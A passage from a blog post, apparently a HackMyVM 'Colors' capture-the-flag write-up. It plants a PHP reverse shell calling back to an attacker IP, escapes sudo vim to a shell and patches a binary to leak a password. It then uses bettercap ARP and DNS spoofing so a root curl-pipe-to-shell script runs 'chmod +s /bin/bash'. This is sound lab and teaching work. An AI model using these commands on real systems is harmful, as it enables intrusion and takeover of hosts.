123     0\n        +       123     0\n\n> \/etc\/ftpusers\n        *       1675181733      0\n        &quot;       1       0<\/code><\/pre>\n<p>Strange files were created under <code>\/var\/www\/html<\/code>, so try to get a shell from there:<\/p>\n<pre><code class=\"language-bash\">pink@color:~$ cat \/var\/www\/html\/sh.php\ncat: \/var\/www\/html\/sh.php: No such file or directory\npink@color:~$ cd \/var\/www\/html\npink@color:\/var\/www\/html$ ls -la\ntotal 828\ndrwxrwxrwx 2 www-data www-data   4096 Feb 11  2023 .\ndrwxr-xr-x 3 root     root       4096 Jan 27  2023 ..\n-rw-r--r-- 1 www-data www-data    295 Jan 27  2023 index.html\n-rw-r--r-- 1 www-data www-data  10701 Jan 27  2023 index.html.bak\n-rw-r--r-- 1 www-data www-data 821574 Jan 27  2023 seized.png\npink@color:\/var\/www\/html$ head index.html\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Document&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;img src=&quot;.\/seized.png&quot; alt=&quot;&quot;&gt;\npink@color:\/var\/www\/html$ cd ..\npink@color:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 Jan 27  2023 .\ndrwxr-xr-x 12 root     root     4096 Jan 27  2023 ..\ndrwxrwxrwx  2 www-data www-data 4096 Feb 11  2023 html\npink@color:\/var\/www$ cd html\npink@color:\/var\/www\/html$ vim revershell.php\npink@color:\/var\/www\/html$ head revershell.php\n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.0.143&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  
$chunk_size = 1400;\npink@color:\/var\/www\/html$ curl http:\/\/0.0.0.0:80\/revershell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517929.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517929.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240427141757189\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Switching to green<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@color:\/$ sudo -l\nMatching Defaults entries for www-data on color:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on color:\n    (green) NOPASSWD: \/usr\/bin\/vim\n(remote) www-data@color:\/$ sudo -u green \/usr\/bin\/vim\n\n# :!\/bin\/bash\n\ngreen@color:\/$ <\/code><\/pre>\n<p>This is a common privilege-escalation path!!!<\/p>\n<pre><code class=\"language-bash\">green@color:\/$ cd \/home\/green\/\ngreen@color:~$ ls -la\ntotal 44\ndrwx------ 2 green green  4096 Feb 11  2023 .\ndrwxr-xr-x 6 root  root   4096 Jan 27  2023 ..\nlrwxrwxrwx 1 root  root      9 Feb 11  2023 .bash_history -&gt; \/dev\/null\n-rwx------ 1 green green   220 Jan 27  2023 .bash_logout\n-rwx------ 1 green green  3526 Jan 27  2023 .bashrc\n-rwx------ 1 green green   807 Jan 27  2023 .profile\n-rw-r--r-- 1 root  root    145 Feb 11  2023 note.txt\n-rwxr-xr-x 1 root  root  16928 Feb 11  2023 
test_4_green\ngreen@color:~$ cat note.txt \nYou&#039;ve been working very well lately Green, so I&#039;m going to give you one last test. If you pass it I&#039;ll give you the password for purple.\n\n-root\ngreen@color:~$ file test_4_green \ntest_4_green: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=9496189c225509b7a26fbf1a874b3edeb9be0859, for GNU\/Linux 3.2.0, not stripped<\/code><\/pre>\n<h3>Analyzing the program<\/h3>\n<p>Download it and see what it contains:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ pwn checksec test_4_green\n[*] &#039;\/home\/kali\/temp\/color\/test_4_green&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      PIE enabled<\/code><\/pre>\n<p>Inspect it with <code>radare2<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ r2 test_4_green                                       \nWarning: run r2 with -e bin.cache=true to fix relocations in disassembly\n[0x000010b0]&gt; aaa\n[x] Analyze all flags starting with sym. 
and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Finding and parsing C++ vtables (avrr)\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information (aanr)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n[0x000010b0]&gt; apl\nCannot find prelude\n[0x000010b0]&gt; iE\n[Exports]\n\nnth paddr      vaddr      bind   type   size lib name\n\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\n45  0x00001340 0x00001340 GLOBAL FUNC   1        __libc_csu_fini\n50  ---------- 0x00004060 GLOBAL NOTYPE 0        _edata\n51  0x00001344 0x00001344 GLOBAL FUNC   0        _fini\n55  0x00003050 0x00004050 GLOBAL NOTYPE 0        __data_start\n57  0x00003058 0x00004058 GLOBAL OBJ    0        __dso_handle\n58  0x00002000 0x00002000 GLOBAL OBJ    4        _IO_stdin_used\n60  0x000012e0 0x000012e0 GLOBAL FUNC   93       __libc_csu_init\n61  ---------- 0x00004068 GLOBAL NOTYPE 0        _end\n62  0x000010b0 0x000010b0 GLOBAL FUNC   43       _start\n63  ---------- 0x00004060 GLOBAL NOTYPE 0        __bss_start\n64  0x000011df 0x000011df GLOBAL FUNC   255      main\n65  0x00001195 0x00001195 GLOBAL FUNC   74       lucas\n67  ---------- 0x00004060 GLOBAL OBJ    0        __TMC_END__\n\n[0x000010b0]&gt; pdf\n            ;-- section..text:\n            ;-- .text:\n            ;-- _start:\n            ;-- rip:\n\u250c 43: entry0 (int64_t arg3);\n\u2502           ; arg int64_t arg3 @ rdx\n\u2502           0x000010b0      31ed           xor ebp, ebp                ; [14] -r-x section size 657 named .text\n\u2502           0x000010b2      4989d1         mov r9, rdx                 ; arg3\n\u2502           0x000010b5      5e      
       pop rsi\n\u2502           0x000010b6      4889e2         mov rdx, rsp\n\u2502           0x000010b9      4883e4f0       and rsp, 0xfffffffffffffff0\n\u2502           0x000010bd      50             push rax\n\u2502           0x000010be      54             push rsp\n\u2502           0x000010bf      4c8d057a0200.  lea r8, [sym.__libc_csu_fini] ; 0x1340\n\u2502           0x000010c6      488d0d130200.  lea rcx, [sym.__libc_csu_init] ; 0x12e0 ; &quot;AWL\\x8d=\\xff*&quot;\n\u2502           0x000010cd      488d3d0b0100.  lea rdi, [main]             ; 0x11df\n\u2502           0x000010d4      ff15062f0000   call qword [reloc.__libc_start_main] ; [0x3fe0:8]=0\n\u2514           0x000010da      f4             hlt\n[0x000010b0]&gt; s main\n[0x000011df]&gt; pdf\n            ; DATA XREF from entry0 @ 0x10cd\n\u250c 255: int main (int argc, char **argv, char **envp);\n\u2502           ; var int64_t var_1d0h @ rbp-0x1d0\n\u2502           ; var int64_t var_ch @ rbp-0xc\n\u2502           ; var uint32_t var_8h @ rbp-0x8\n\u2502           ; var signed int64_t var_4h @ rbp-0x4\n\u2502           0x000011df      55             push rbp\n\u2502           0x000011e0      4889e5         mov rbp, rsp\n\u2502           0x000011e3      4881ecd00100.  sub rsp, 0x1d0\n\u2502           0x000011ea      bf00000000     mov edi, 0                  ; time_t *timer\n\u2502           0x000011ef      e87cfeffff     call sym.imp.time           ; time_t time(time_t *timer)\n\u2502           0x000011f4      89c7           mov edi, eax                ; int seed\n\u2502           0x000011f6      e865feffff     call sym.imp.srand          ; void srand(int seed)\n\u2502           0x000011fb      e890feffff     call sym.imp.rand           ; int rand(void)\n\u2502           0x00001200      4863d0         movsxd rdx, eax\n\u2502           0x00001203      4869d283de1b.  
imul rdx, rdx, 0x431bde83\n\u2502           0x0000120a      48c1ea20       shr rdx, 0x20\n\u2502           0x0000120e      c1fa12         sar edx, 0x12\n\u2502           0x00001211      89c1           mov ecx, eax\n\u2502           0x00001213      c1f91f         sar ecx, 0x1f\n\u2502           0x00001216      29ca           sub edx, ecx\n\u2502           0x00001218      69ca40420f00   imul ecx, edx, 0xf4240\n\u2502           0x0000121e      29c8           sub eax, ecx\n\u2502           0x00001220      89c2           mov edx, eax\n\u2502           0x00001222      8d4201         lea eax, [rdx + 1]\n\u2502           0x00001225      8945f8         mov dword [var_8h], eax\n\u2502           0x00001228      488d3dd90d00.  lea rdi, str.Guess_the_number_im_thinking:_ ; 0x2008 ; &quot;Guess the number im thinking: &quot; ; const char *format\n\u2502           0x0000122f      b800000000     mov eax, 0\n\u2502           0x00001234      e817feffff     call sym.imp.printf         ; int printf(const char *format)\n\u2502           0x00001239      488d45f4       lea rax, [var_ch]\n\u2502           0x0000123d      4889c6         mov rsi, rax\n\u2502           0x00001240      488d3de00d00.  lea rdi, [0x00002027]       ; &quot;%d&quot; ; const char *format\n\u2502           0x00001247      b800000000     mov eax, 0\n\u2502           0x0000124c      e82ffeffff     call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n\u2502           0x00001251      8b45f4         mov eax, dword [var_ch]\n\u2502           0x00001254      3945f8         cmp dword [var_8h], eax\n\u2502       \u250c\u2500&lt; 0x00001257      7572           jne 0x12cb\n\u2502       \u2502   0x00001259      488d3dca0d00.  lea rdi, str.Correct___Here_is_the_pass: ; 0x202a ; &quot;Correct!! Here is the pass:&quot; ; const char *s\n\u2502       \u2502   0x00001260      e8dbfdffff     call sym.imp.puts           ; int puts(const char *s)\n\u2502       \u2502   0x00001265      488d8530feff.  
lea rax, [var_1d0h]\n\u2502       \u2502   0x0000126c      488d15e50d00.  lea rdx, str.FuprpRblcTzeg5JDNNasqeWKpFHvms4rMgrpAFYj5Zngqgvl7jK0iPpViDReY6nognFSGKtS4zTEiVPgzDXnPj06WsScYlt0EFryMGvP8SjVsg9YjmxTeHkXUdzliZK8zqVCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKMGvP8SjVsg9YjmxTeHkXUdzkiZK8zqaCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKMGvP8SjVsg9YjmxTeHkXUdzkiZK8zqVCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKhaAWAR7kxJC8METsFLehuWd43P8kj2z2uyEBDD3dGEGdisWzwcSMBj6oh4R9HBDEJVr23haAWAR7kxJC8METFFLehuWd43P8kj2z2uyEBDD3dGEGdisWzwcSMBj6oh4R9HBDEJVr23 ; 0x2058 ; &quot;FuprpRblcTzeg5JDNNasqeWKpFHvms4rMgrpAFYj5Zngqgvl7jK0iPpViDReY6nognFSGKtS4zTEiVPgzDXnPj06WsScYlt0EFryMGvP8SjVsg9YjmxTeHkXUdzliZK8zqVCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKMGvP8SjVsg9YjmxTeHkXUdzkiZK8zqaCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKMGvP8SjVsg9YjmxTeHkXUdzkiZK8zqVCv2pZnGJ7L8e6DCsDPjNvjkVYR3WiRhf9jXCRKhaAWAR7kxJC8METsFLehuWd43P8kj2z2uyEBDD3dGEGdisWzwcSMBj6oh4R9HBDEJVr23haAWAR7kxJC8METFFLehuWd43P8kj2z2uyEBDD3dGEGdisWzwcSMBj6oh4R9HBDEJVr23&quot;\n\u2502       \u2502   0x00001273      b937000000     mov ecx, 0x37               ; &#039;7&#039;\n\u2502       \u2502   0x00001278      4889c7         mov rdi, rax\n\u2502       \u2502   0x0000127b      4889d6         mov rsi, rdx\n\u2502       \u2502   0x0000127e      f348a5         rep movsq qword [rdi], qword ptr [rsi]\n\u2502       \u2502   0x00001281      4889f2         mov rdx, rsi\n\u2502       \u2502   0x00001284      4889f8         mov rax, rdi\n\u2502       \u2502   0x00001287      8b0a           mov ecx, dword [rdx]\n\u2502       \u2502   0x00001289      8908           mov dword [rax], ecx\n\u2502       \u2502   0x0000128b      488d4004       lea rax, [rax + 4]\n\u2502       \u2502   0x0000128f      488d5204       lea rdx, [rdx + 4]\n\u2502       \u2502   0x00001293      0fb60a         movzx ecx, byte [rdx]\n\u2502       \u2502   0x00001296      8808           mov byte [rax], cl\n\u2502       \u2502   0x00001298      c745fc000000.  
mov dword [var_4h], 0\n\u2502      \u250c\u2500\u2500&lt; 0x0000129f      eb22           jmp 0x12c3\n\u2502      \u2502\u2502   ; CODE XREF from main @ 0x12c7\n\u2502     \u250c\u2500\u2500\u2500&gt; 0x000012a1      8b45fc         mov eax, dword [var_4h]\n\u2502     \u254e\u2502\u2502   0x000012a4      89c7           mov edi, eax                ; uint32_t arg1\n\u2502     \u254e\u2502\u2502   0x000012a6      e8eafeffff     call sym.lucas\n\u2502     \u254e\u2502\u2502   0x000012ab      4898           cdqe\n\u2502     \u254e\u2502\u2502   0x000012ad      0fb6840530fe.  movzx eax, byte [rbp + rax - 0x1d0]\n\u2502     \u254e\u2502\u2502   0x000012b5      0fbec0         movsx eax, al\n\u2502     \u254e\u2502\u2502   0x000012b8      89c7           mov edi, eax                ; int c\n\u2502     \u254e\u2502\u2502   0x000012ba      e871fdffff     call sym.imp.putchar        ; int putchar(int c)\n\u2502     \u254e\u2502\u2502   0x000012bf      8345fc01       add dword [var_4h], 1\n\u2502     \u254e\u2502\u2502   ; CODE XREF from main @ 0x129f\n\u2502     \u254e\u2514\u2500\u2500&gt; 0x000012c3      837dfc0c       cmp dword [var_4h], 0xc\n\u2502     \u2514\u2500\u2500\u2500&lt; 0x000012c7      7ed8           jle 0x12a1\n\u2502      \u250c\u2500\u2500&lt; 0x000012c9      eb0c           jmp 0x12d7\n\u2502      \u2502\u2502   ; CODE XREF from main @ 0x1257\n\u2502      \u2502\u2514\u2500&gt; 0x000012cb      488d3d740d00.  
lea rdi, str.Nope__sorry    ; 0x2046 ; &quot;Nope, sorry&quot; ; const char *s\n\u2502      \u2502    0x000012d2      e869fdffff     call sym.imp.puts           ; int puts(const char *s)\n\u2502      \u2502    ; CODE XREF from main @ 0x12c9\n\u2502      \u2514\u2500\u2500&gt; 0x000012d7      b800000000     mov eax, 0\n\u2502           0x000012dc      c9             leave\n\u2514           0x000012dd      c3             ret<\/code><\/pre>\n<p>According to other authors&#039; blogs, the binary has to be opened in write mode here so that the assembly can be modified:<\/p>\n<p>Note this instruction:<\/p>\n<pre><code class=\"language-apl\">0x00001257      7572           jne 0x12cb<\/code><\/pre>\n<p>Here <strong>jne 0x12cb is a conditional jump instruction<\/strong>. When ZF (the zero flag) is 0, execution jumps to the label 0x12cb. Its opposite is <code>je<\/code> (Jump if Equal): when the zero flag is set (ZF=1), <code>je<\/code> takes the jump. Swapping <code>jne<\/code> for <code>je<\/code> inverts the check, so a wrong guess falls through to the branch that prints the password!<\/p>\n<h4>Open in write mode<\/h4>\n<pre><code class=\"language-apl\">r2 -w .\/test_4_green<\/code><\/pre>\n<h4>Visual mode<\/h4>\n<pre><code class=\"language-apl\">V<\/code><\/pre>\n<h4>Show the disassembly<\/h4>\n<pre><code class=\"language-apl\">p<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517930.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517930.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240427144954098\" \/><\/div><\/p>\n<p>As shown, a wrong input makes the program print the failure message!<\/p>\n<h4>Patching<\/h4>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517931.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517931.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240427145031340\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">shift+a<\/code><\/pre>\n<p>Write <code>je 0x12cb<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517932.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517932.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240427145131381\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Then press <code>Enter<\/code> and type <code>Y<\/code> to save the change!<\/p>\n<h4>Quit and run<\/h4>\n<p>Once the patch is in place, quit and enter any number to get the flag! (Not the machine&#039;s flag; this is the program&#039;s own flag.)<\/p>\n<p>Press <code>q<\/code>, then type <code>q<\/code> and <code>enter<\/code> to quit, then run the binary!<\/p>\n<pre><code class=\"language-bash\">[0x00001281]&gt; q\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/color]\n\u2514\u2500# .\/test_4_green \nGuess the number im thinking: 6666\nCorrect!! 
Here is the pass:\npurpleaslilas<\/code><\/pre>\n<h3>Switching to purple<\/h3>\n<pre><code class=\"language-bash\">(remote) green@color:\/home\/green$ su -l purple\nPassword: \npurple@color:~$ ls -la\ntotal 32\ndrwx------ 2 purple purple 4096 Feb 20  2023 .\ndrwxr-xr-x 6 root   root   4096 Jan 27  2023 ..\nlrwxrwxrwx 1 root   root      9 Feb 11  2023 .bash_history -&gt; \/dev\/null\n-rwx------ 1 purple purple  220 Jan 27  2023 .bash_logout\n-rwx------ 1 purple purple 3526 Jan 27  2023 .bashrc\n-rw-r--r-- 1 root   root     77 Feb 11  2023 for_purple_only.txt\n-rwx------ 1 purple purple  807 Jan 27  2023 .profile\n-rw-r--r-- 1 root   root     14 Feb 11  2023 user.txt\n-rw------- 1 purple purple  868 Feb 20  2023 .viminfo\npurple@color:~$ cat user.txt \n(:Ez_Colors:)\npurple@color:~$ sudo -l\nMatching Defaults entries for purple on color:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser purple may run the following commands on color:\n    (root) NOPASSWD: \/attack_dir\/ddos.sh\npurple@color:~$ cat \/attack_dir\/ddos.sh\n#!\/bin\/bash\n\/usr\/bin\/curl http:\/\/masterddos.hmv\/attack.sh | \/usr\/bin\/sh -p\npurple@color:~$ cat for_purple_only.txt \nAs the highest level user I allow you to use the supreme ddos attack script.<\/code><\/pre>\n<h3>ARP spoofing<\/h3>\n<p>The group owner recommended a tool called <code>bettercap<\/code> a while ago, so let&#039;s try it:<\/p>\n<h4>First, write a privilege-escalation script<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ echo &#039;chmod +s \/bin\/bash&#039; &gt; attack.sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ python3 -m http.server 80  \nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n192.168.0.162 - - [27\/Apr\/2024 03:10:53] &quot;GET \/attack.sh HTTP\/1.1&quot; 200 
-\n^C\nKeyboard interrupt received, exiting.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ chmod +x attack.sh \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/color]\n\u2514\u2500$ python3 -m http.server 80\nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n192.168.0.162 - - [27\/Apr\/2024 03:12:13] &quot;GET \/attack.sh HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<blockquote>\n<p>Be sure to remember to grant execute permission! (sad.jpg)<\/p>\n<\/blockquote>\n<h4>Enable DNS spoofing and ARP spoofing with bettercap<\/h4>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517933.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404271517933.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240427151417692\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">set dns.spoof.domains masterddos.hmv\nset dns.spoof.address 192.168.0.143\nset arp.spoof.targets 192.168.0.162\ndns.spoof on\narp.spoof on<\/code><\/pre>\n<h4>Run the script to get a root shell<\/h4>\n<p>I tested it out first here and got it wrong once (the consequence of not setting the executable bit, sad)<\/p>\n<pre><code class=\"language-bash\">purple@color:~$ curl http:\/\/masterddos.hmv\/attack.sh\nchmod +s \/bin\/bash\npurple@color:~$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 
\/bin\/bash\npurple@color:~$ sudo \/attack_dir\/ddos.sh\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (6) Could not resolve host: masterddos.hmv\npurple@color:~$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\npurple@color:~$ sudo \/attack_dir\/ddos.sh\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100    19  100    19    0     0    904      0 --:--:-- --:--:-- --:--:--   904\npurple@color:~$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\npurple@color:~$ bash -p\nbash-5.1# cd \/root\nbash-5.1# ls -la\ntotal 40\ndrwx------  4 root root  4096 Feb 20  2023 .\ndrwxr-xr-x 19 root root  4096 Feb 20  2023 ..\nlrwxrwxrwx  1 root root     9 Jan 31  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root   571 Apr 10  2021 .bashrc\n-rw-r--r--  1 root root   161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   475 Feb 11  2023 root.txt\ndrwx------  2 root root  4096 Feb 11  2023 .ssh\ndrwxr-xr-x  2 root root  4096 Feb 11  2023 .vim\n-rw-------  1 root root 11088 Feb 20  2023 .viminfo\nbash-5.1# cat root.txt \nI hope you liked it :)\n\nHere, some chocolate and the flag:\n\n(:go_play_some_minecraft:)\n\n    ___  ___  ___  ___  ___.---------------.\n  .&#039;\\__\\&#039;\\__\\&#039;\\__\\&#039;\\__\\&#039;\\__,`   .  ____ ___ \\\n  |\\\/ __\\\/ __\\\/ __\\\/ __\\\/ _:\\   |:.  \\  \\___ \\\n   \\\\&#039;\\__\\&#039;\\__\\&#039;\\__\\&#039;\\__\\&#039;\\_`.__|  `. 
\\  \\___ \\\n    \\\\\/ __\\\/ __\\\/ __\\\/ __\\\/ __:                \\\n     \\\\&#039;\\__\\&#039;\\__\\&#039;\\__\\ \\__\\&#039;\\_;-----------------`\n      \\\\\/   \\\/   \\\/   \\\/   \\\/ :                 |\n       \\|______________________;________________|\n<\/code><\/pre>\n<p>And with that, it is finally done!<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV16C4y1r7bv\">https:\/\/www.bilibili.com\/video\/BV16C4y1r7bv<\/a>  Highly recommended! lol!!!<\/p>\n<p><a href=\"https:\/\/0xh3rshel.github.io\/hmv-colors\/\">https:\/\/0xh3rshel.github.io\/hmv-colors\/<\/a><\/p>\n<p><a href=\"https:\/\/0x-noname.github.io\/writeups\/hmv\/colors\">https:\/\/0x-noname.github.io\/writeups\/hmv\/colors<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Colors Hey hacker, I&#039;ve heard a lot about you and  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,22,18],"tags":[],"class_list":["post-643","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-reverse","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/643","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=643"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/643\/revisions"}],"predecessor-version":[{"id":644,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/
